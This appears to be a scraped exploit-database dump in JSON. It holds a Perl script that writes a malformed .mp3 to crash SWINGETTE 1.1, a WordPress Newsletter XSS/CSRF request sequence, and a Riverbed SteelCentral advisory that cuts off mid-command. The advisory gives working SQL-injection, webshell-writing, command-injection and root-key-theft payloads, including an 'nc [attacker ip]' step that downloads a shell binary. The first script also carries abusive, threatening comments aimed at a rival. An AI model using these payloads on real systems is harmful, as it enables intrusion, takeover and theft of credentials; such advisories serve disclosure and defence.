ID 1337DAY-ID-9625 Type zdt Reporter cr4wl3r Modified 2010-03-15T00:00:00
Description
Exploit for windows platform in category dos / poc
================================================
SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit
================================================
# SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : Inj3ct0r.com 0
# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1
# 0 0
# 1 ###################################### 1
# 0 I'm cr4wl3r member from Inj3ct0r Team 1
# 1 ###################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#[+] Discovered By: cr4wl3r
print mp3 "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
print mp3 "\x4D\x54\x68\x64";
print mp3 "\x4D\x54\x68\x64";
print mp3 "\x4D\x54\x68\x64";
print mp3 "\x4D\x54\x68\x64";
open(mp3, ">sploit.mp3");
# Note: dapet email account doank??? bruakakaka. eh njing loe tanya aja ama FO nya langsung. gw dapet apa???
# bukannya loe yang ngirim email ama FOnya buat ngelink web loe??? sampe skrng engga direp ama FO nya. krna dia tau loe itu dodol.
# loe bilang apa??? keluarga gw??? wkwkwkwkwk. loe aja belum lepas netek dari mak loe mau ngajak berantem???
# eh njink gw tau loe dimana skrng.
# gw ama temen forum gw??? tuh liahat aja siapa special Greets noh??? yang paling ujung tuh siapa??? dia anak forum gw njing, dan smpe itu loe minta2 ampun ama dia krna blog loe engga hidup2 lagi ampe skrng.
# masih mau belagu loe njing??? badan hanya tinggal bonus gitu engga usah belagu.
# 0day.today [2018-03-09] #
{"hash": "f7ff26d7fae8af979648f5346b9f98491591dee1941e0dabd04728e6a327ef10", "id": "1337DAY-ID-9625", "lastseen": "2018-03-09T23:25:36", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "555c5a63bf9ec8f4036cd17c3a89f3a4", "key": "href"}, {"hash": "19868d9c78f497967ef311abb34a40d5", "key": "modified"}, {"hash": "19868d9c78f497967ef311abb34a40d5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "2334125181df3b2c18b2086aff8b0171", "key": "reporter"}, {"hash": "b1d7c856a4eefc7332f34595a90e860b", "key": "sourceData"}, {"hash": "13909a85079f11bb524b017f0b384363", "key": "sourceHref"}, {"hash": "04209fa43b7a09fb0f0a8e3c734aff97", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 10.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/9625", "description": "Exploit for windows platform in category dos / poc", "title": "SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit", "history": [{"bulletin": {"hash": "e36ab94f083b500afb79755656dfb551465163851c1bf33665993519ce778208", "id": "1337DAY-ID-9625", "lastseen": "2016-04-19T10:09:20", "enchantments": {"score": {"value": 5.1, "modified": "2016-04-19T10:09:20"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "bb737bc4bf8bc1b3d7d0c0b68d280a00", "key": "href"}, {"hash": "a627c6235b9868e980bce33f303a134d", "key": "sourceData"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "2334125181df3b2c18b2086aff8b0171", "key": "reporter"}, {"hash": "19868d9c78f497967ef311abb34a40d5", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "04209fa43b7a09fb0f0a8e3c734aff97", "key": "title"}, {"hash": "7d9a4832ee8565d2919a39f12747188c", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "19868d9c78f497967ef311abb34a40d5", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/9625", "description": "Exploit for windows platform in category dos / poc", "viewCount": 0, "title": "SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "================================================\r\nSWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit\r\n================================================\r\n\r\n# SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit\r\n\r\n# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n# 0 _ __ __ __ 1\r\n# 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n# 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n# 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n# 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n# 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n# 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n# 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n# 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n# 1 1\r\n# 0 [+] Site : Inj3ct0r.com 0\r\n# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n# 0 0\r\n# 1 ###################################### 1\r\n# 0 I'm cr4wl3r member from Inj3ct0r Team 1\r\n# 1 ###################################### 0\r\n# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n#[+] Discovered By: cr4wl3r\r\n\r\n\r\nprint mp3 \"\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\".\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nopen(mp3, \">sploit.mp3\");\r\n\r\n\r\n# Note: dapet email account doank??? bruakakaka. eh njing loe tanya aja ama FO nya langsung. gw dapet apa???\r\n# bukannya loe yang ngirim email ama FOnya buat ngelink web loe??? sampe skrng engga direp ama FO nya. krna dia tau loe itu dodol.\r\n# loe bilang apa??? keluarga gw??? wkwkwkwkwk. loe aja belum lepas netek dari mak loe mau ngajak berantem???\r\n# eh njink gw tau loe dimana skrng. \r\n# gw ama temen forum gw??? tuh liahat aja siapa special Greets noh??? yang paling ujung tuh siapa??? dia anak forum gw njing, dan smpe itu loe minta2 ampun ama dia krna blog loe engga hidup2 lagi ampe skrng.\r\n# masih mau belagu loe njing??? badan hanya tinggal bonus gitu engga usah belagu.\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2010-03-15T00:00:00", "references": [], "reporter": "cr4wl3r", "modified": "2010-03-15T00:00:00", "href": "http://0day.today/exploit/description/9625"}, "lastseen": "2016-04-19T10:09:20", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "================================================\r\nSWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit\r\n================================================\r\n\r\n# SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit\r\n\r\n# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n# 0 _ __ __ __ 1\r\n# 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n# 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n# 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n# 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n# 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n# 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n# 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n# 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n# 1 1\r\n# 0 [+] Site : Inj3ct0r.com 0\r\n# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n# 0 0\r\n# 1 ###################################### 1\r\n# 0 I'm cr4wl3r member from Inj3ct0r Team 1\r\n# 1 ###################################### 0\r\n# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n#[+] Discovered By: cr4wl3r\r\n\r\n\r\nprint mp3 \"\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\".\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nopen(mp3, \">sploit.mp3\");\r\n\r\n\r\n# Note: dapet email account doank??? bruakakaka. eh njing loe tanya aja ama FO nya langsung. gw dapet apa???\r\n# bukannya loe yang ngirim email ama FOnya buat ngelink web loe??? sampe skrng engga direp ama FO nya. krna dia tau loe itu dodol.\r\n# loe bilang apa??? keluarga gw??? wkwkwkwkwk. loe aja belum lepas netek dari mak loe mau ngajak berantem???\r\n# eh njink gw tau loe dimana skrng. \r\n# gw ama temen forum gw??? tuh liahat aja siapa special Greets noh??? yang paling ujung tuh siapa??? dia anak forum gw njing, dan smpe itu loe minta2 ampun ama dia krna blog loe engga hidup2 lagi ampe skrng.\r\n# masih mau belagu loe njing??? badan hanya tinggal bonus gitu engga usah belagu.\r\n\r\n\r\n\n# 0day.today [2018-03-09] #", "published": "2010-03-15T00:00:00", "references": [], "reporter": "cr4wl3r", "modified": "2010-03-15T00:00:00", "href": "https://0day.today/exploit/description/9625"}
{"result": {"zdt": [{"lastseen": "2018-01-02T17:10:13", "references": [], "edition": 2, "description": "Exploit for php platform in category web applications", "reporter": "Keith Lee", "published": "2016-10-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "WordPress Newsletter 4.6.0 Cross Site Request Forgery / Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-10-15T00:00:00", "id": "1337DAY-ID-25575", "href": "https://0day.today/exploit/description/25575", "sourceData": "Wordpress Plugin: Newsletter 4.6.0 https://wordpress.org/plugins/newsletter/ is\r\nvulnerable to CSRF and XSS.\r\nThe issue is supposed to be fixed in version 4.6.1 . See\r\nhttps://wordpress.org/plugins/newsletter/changelog/ for more details.\r\n\r\n\r\n1. Stored Cross-Site Scripting (XSS)\r\n\r\nAuthenticated administrators can inject html/js code (there is no CSRF\r\nprotection).\r\n\r\n*Injection Location: *http://localhost/wordpress/wp-admin/admin.php?page=\r\nnewsletter_subscription_lists\r\n*Method: *POST\r\n*Retrieval Location: *http://localhost/wordpress/wp-admin/admin.php?page=\r\nnewsletter_users_massive\r\n*Vulnerable Parameter(s): *\r\noptions[list_1]\r\noptions[list_2]\r\noptions[list_3]\r\noptions[list_4]\r\noptions[list_5]\r\noptions[list_6]\r\noptions[list_7]\r\noptions[list_8]\r\noptions[list_9]\r\noptions[list_10]\r\noptions[list_11]\r\noptions[list_12]\r\noptions[list_13]\r\noptions[list_14]\r\noptions[list_15]\r\noptions[list_16]\r\noptions[list_17]\r\noptions[list_18]\r\noptions[list_19]\r\noptions[list_20]\r\n\r\n*Example Attack:*\r\n*Request:*\r\nPOST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists\r\nHTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0)\r\nGecko/20100101 Firefox/48.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/wordpress/wp-admin/admin.php?page=\r\nnewsletter_subscription_lists\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1762\r\n\r\nact=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin%\r\n2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D=\r\ntest&options%5Blist_1_status%5D=1&options%5Blist_1_checked%\r\n5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0&\r\noptions%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options%\r\n5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options%\r\n5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_\r\nchecked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status%\r\n5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=&\r\noptions%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0&\r\noptions%5Blist_7%5D=bi1x5<script>alert('spiderlabs')<%\r\n2fscript>gjoce&options%5Blist_7_status%5D=0&options%5Blist_\r\n7_checked%5D=0&options%5Blist_8%5D=&options%5Blist_8_status%\r\n5D=0&options%5Blist_8_checked%5D=0&options%5Blist_9%5D=&\r\noptions%5Blist_9_status%5D=0&options%5Blist_9_checked%5D=0&\r\noptions%5Blist_10%5D=&options%5Blist_10_status%5D=0&options%\r\n5Blist_10_checked%5D=0&options%5Blist_11%5D=&options%\r\n5Blist_11_status%5D=0&options%5Blist_11_checked%5D=0&\r\noptions%5Blist_12%5D=&options%5Blist_12_status%5D=0&options%\r\n5Blist_12_checked%5D=0&options%5Blist_13%5D=&options%\r\n5Blist_13_status%5D=0&options%5Blist_13_checked%5D=0&\r\noptions%5Blist_14%5D=&options%5Blist_14_status%5D=0&options%\r\n5Blist_14_checked%5D=0&options%5Blist_15%5D=&options%\r\n5Blist_15_status%5D=0&options%5Blist_15_checked%5D=0&\r\noptions%5Blist_16%5D=&options%5Blist_16_status%5D=0&options%\r\n5Blist_16_checked%5D=0&options%5Blist_17%5D=&options%\r\n5Blist_17_status%5D=0&options%5Blist_17_checked%5D=0&\r\noptions%5Blist_18%5D=&options%5Blist_18_status%5D=0&options%\r\n5Blist_18_checked%5D=0&options%5Blist_19%5D=&options%\r\n5Blist_19_status%5D=0&options%5Blist_19_checked%5D=0&\r\noptions%5Blist_20%5D=&options%5Blist_20_status%5D=0&options%\r\n5Blist_20_checked%5D=0\r\n\r\n*Response:*\r\nHTTP/1.1 200 OK\r\nDate: Wed, 28 Sep 2016 17:40:12 GMT\r\nServer: Apache\r\nX-Powered-By: PHP/7.0.10\r\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nX-Frame-Options: SAMEORIGIN\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 102536\r\n\r\n*Request:*\r\nGET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1\r\nHost: localhost:8888\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;\r\nTrident/5.0)\r\nConnection: close\r\nReferer: http://localhost:8888/wordpress/wp-admin/admin.php?\r\npage=newsletter_users_massive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n*Response:*\r\nHTTP/1.1 200 OK\r\nDate: Wed, 28 Sep 2016 17:40:37 GMT\r\nServer: Apache\r\nX-Powered-By: PHP/7.0.10\r\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nX-Frame-Options: SAMEORIGIN\r\nX-UA-Compatible: IE=edge\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 98989\r\n\r\nFor preference <select id=\"options-list\" name=\"options[list]\"><option\r\nvalue=\"1\">(1) test</option><option value=\"2\">(2) </option><option\r\nvalue=\"3\">(3) </option><option value=\"4\">(4) </option><option value=\"5\">(5)\r\n</option><option value=\"6\">(6) </option><option value=\"7\">(7)\r\nbi1x5<script>alert('spiderlabs')</script>gjoce</option><option\r\nvalue=\"8\">(8)\r\n\r\n*Vulnerable PHP Code*\r\n/newsletter/subscription/lists.php:51,52\r\n/users/massive.php\r\n\r\n-- \r\nRegards,\r\nKeith Lee\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25575"}, {"lastseen": "2018-02-07T01:07:31", "references": [], "edition": 2, "description": "Exploit for php platform in category web applications", "reporter": "Security-Assessment", "published": "2016-06-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "zdt", "title": "Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-06-27T00:00:00", "id": "1337DAY-ID-25136", "href": "https://0day.today/exploit/description/25136", "sourceData": "Riverbed SteelCentral NetProfiler & NetExpress Multiple Vulnerabilities\r\nAffected versions: SteelCentral NetProfiler <= 10.8.7 & SteelCentral\r\nNetExpress <= 10.8.7\r\n \r\nPDF:\r\nhttp://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf\r\n \r\n+-----------+\r\n|Description|\r\n+-----------+\r\nThe Riverbed SteelCentral NetProfiler and NetExpress virtual appliances,\r\nwhich share the same code base, are affected by multiple security\r\nvulnerabilities, including authentication bypass, SQL injection,\r\narbitrary code execution via command injection, privilege escalation,\r\nlocal file inclusion, account hijacking and hardcoded default\r\ncredentials. Details for other low severity vulnerabilities (i.e.\r\ncross-site scripting) are available in the accompanying PDF.\r\n \r\n+------------+\r\n|Exploitation|\r\n+------------+\r\n==SQL Injection==\r\nThe \u2018username\u2019 POST parameter in the login method of the common REST API\r\nis vulnerable to SQL injection via stacked queries. An attacker can\r\nexploit this vulnerability to add a user account in the application\u2019s\r\nPostgreSQL database and successfully bypass authentication. The\r\nexploitation of this vulnerability can also be replicated from the main\r\nweb GUI login functionality as login calls are routed to the same common\r\nREST API web service.\r\n \r\nThe proof-of-concept request below shows how to exploit the SQL\r\ninjection vulnerability to add a malicious user account into the \u2018users\u2019\r\ntable of the application database. Since quote characters can't be used\r\nas part of the injection payload, an attacker needs to use string\r\nconcatenation to insert the field values (i.e. 'user' =>\r\nCHR(117)||CHR(115)||CHR(101)||CHR(114)).\r\n \r\n[POC SQL INJECTION - INSERT USER]\r\nMethod => POST\r\nURL => /api/common/1.0/login\r\nContent-type => application/json\r\nPayload => {\r\n \"username\": \"test%';INSERT INTO users (username, password, uid) VALUES\r\n(<user>, <SHA512 hash>, <random id>);--\",\r\n \"password\": \"\"\r\n}\r\n \r\nAdditional SQL Injection vulnerabilities exist in the application\u2019s web\r\ninterface and can be exploited after authentication.\r\n \r\nMethod => GET\r\nURL => /popup.php?page=export_report\r\nParameter => report_id\r\nPOC Payload => 1';SELECT PG_SLEEP(5)--\r\n \r\nMethod => GET\r\nURL => /popup.php?page=algorithm_settings\r\nParameter => id\r\nPOC Payload => 1';SELECT PG_SLEEP(5)-- \r\n \r\nMethod => POST\r\nURL => /index.php?page=port_config\r\nParameter => PortsSelectControl/ports_config/port_names\r\nPOC Payload => ') AND 9625=(SELECT 9625 FROM PG_SLEEP(5)) AND\r\n('Pdyu'='Pdyu \r\n \r\nMethod => POST\r\nURL => /index.php?page=port_config\r\nParameter => PortsSelectControl/ports_config/port_numbers\r\nPOC Payload => 1-100) AND 5045=(SELECT 5045 FROM PG_SLEEP(5)) AND (2272=2272\r\n \r\nMethod => POST\r\nURL => /index.php?page=port_config\r\nParameter => PortsSelectControl/ports_config/port_proto\r\nPOC Payload => ');SELECT PG_SLEEP(5)--\r\n \r\nAll the SQL injections above can be trivially exploited to write\r\nmalicious PHP code into a directory under the application web root\r\nfolder, such as one used for file uploads, and obtain arbitrary code\r\nexecution.\r\n \r\n[POC SQL INJECTION - WRITE WEBSHELL] \r\nGET\r\n/popup.php?page=export_report&report_id=1';COPY+(SELECT+CHR(60)||CHR(63)||CHR(112)\r\n||CHR(104)||CHR(112)||CHR(32)||CHR(101)||CHR(99)||CHR(104)||CHR(111)||CHR(32)||CHR(115)\r\n||CHR(121)||CHR(115)||CHR(116)||CHR(101)||CHR(109)||CHR(40)||CHR(36)||CHR(95)||CHR(71)\r\n||CHR(69)||CHR(84)||CHR(91)||CHR(34)||CHR(99)||CHR(109)||CHR(100)||CHR(34)||CHR(93)\r\n||CHR(41)||CHR(59)||CHR(32)||CHR(63)||CHR(62))+TO+$$/usr/mazu/www/tmp/imports/shell.php$$;--\r\n&export_type=3\r\n \r\n \r\n==Command Injection==\r\nMultiple command injection vulnerabilities exist in the appliances\u2019 web\r\ninterfaces due to unsanitized user-supplied input passed as argument to\r\nshell functions. An attacker can exploit these vulnerabilities to inject\r\nshell commands and obtain arbitrary code execution.\r\n \r\nURL => GET\r\n/popup.php?page=test_connection&device=<PAYLOAD>&type=switch\r\nParameter => device\r\nPOC Payload => 1; touch /tmp/FILE;\r\n \r\nURL => POST /index.php?page=licenses\r\nBody => xjxfun=get_request_key&xjxr=<value>&xjxargs[]=<PAYLOAD>\r\nParameter => xjxargs[]\r\nPOC Payload => LICENSE-TOKEN; id;\r\nNotes => Token Request functionality in 'Licenses' page\r\n \r\nURL => GET /popup.php?page=packet_export&query=<PAYLOAD>\r\nParameter => query\r\nPOC Payload => 1; touch /tmp/MYFILE;\r\n \r\nURL => POST /index.php?page=network_config\r\nBody => <configuration params>&Setup/setup/network_hostname=<PAYLOAD>\r\nParameter => Setup/setup/network_hostname\r\nPOC Payload => 1; touch /tmp/MYFILE;\r\nNotes => 'Configure now' functionality, injection occurs after\r\nappliance reboots.\r\n \r\nURL => POST /index.php?page=product_info\r\nBody => xjxfun=delete_collect&&xjxr=<value>&xjxargs[]=<PAYLOAD>\r\nParameter => xjxargs[]\r\nPOC Payload => 1; touch /tmp/MYFILE;\r\nNotes => 'Delete collected entry' functionality\r\n \r\n==Privilege Escalation==\r\nAn insecure configuration of the /etc/sudoers file allows privilege\r\nescalation to root. The \u2018apache\u2019 user is allowed to run multiple scripts\r\nunder the /usr/mazu/bin directory without being prompted for a password,\r\nincluding the following sudoers entry:\r\n \r\n/usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date*\r\n \r\nThe \u2018mazu-run\u2019 script can be used to invoke the /bin/date binary in the\r\ncontext of the built-in \u2018mazu\u2019 user. An attacker can abuse the mazu-run\r\nscript to run the /bin/date binary with the \u2013f flag against a sensitive\r\nfile such as the root private SSH key. The \u2018\u2013f\u2019 option instructs the\r\n\u2018date\u2019 binary to parse the file specified as a DATEFILE. By default, the\r\ncommand \u2018date\u2019 will echo back an error message with the contents of the\r\nspecified file when this does not comply with a valid DATEFILE format.\r\nThis technique can be exploited to get the root SSH private RSA key and\r\nwrite it into the appliance filesystem using output redirection. An\r\nattacker can then establish a SSH connection to the target system by\r\nusing the dumped private key to authenticate as root and spawn a root\r\nreverse shell. The POC payload below shows how to exploit the vulnerability.\r\n \r\n[POC PRIVILEGE ESCALATION]\r\nsudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f\r\n/opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4-\r\n| tr -d '`' | tr -d \"'\" > /tmp/root_ssh_privatekey; chmod 600\r\n/tmp/root_ssh_privatekey; ssh -o UserKnownHostsFile=/dev/null\r\n -o StrictHostKeyChecking=no -i /tmp/root_ssh_privatekey [email\u00a0protected]\r\n'nc -n [attacker ip] 4444 > /tmp/shell.elf;\r\nchmod 755 /tmp/shell.elf; /tmp/shell.elf';\r\n \r\n==Local File Inclusion==\r\nA local file inclusion vulnerability exists in the\r\n\u2018sensor/ta_loader.php\u2019 file due to a lack of input sanization for the\r\nGET parameter \u2018class\u2019. This allows an attacker to read or include\r\narbitrary files.\r\n \r\nAs a practical exploitation scenario, an attacker can obtain arbitrary\r\ncode execution through the LFI vulnerability by first using the \u2018Edit\r\n/etc/hosts\u2019 functionality available under\r\n\u2018/index.php?page=network_config\u2019 to create a fake host entry (e.g.\r\n'192.1.2.3 <?php echo system($_GET[\"cmd\"]); ?>' ) and write malicious\r\nPHP code on the appliance filesystem, then include the /etc/hosts file\r\nand execute arbitrary shell commands.\r\n \r\n[POC LFI]\r\ncurl 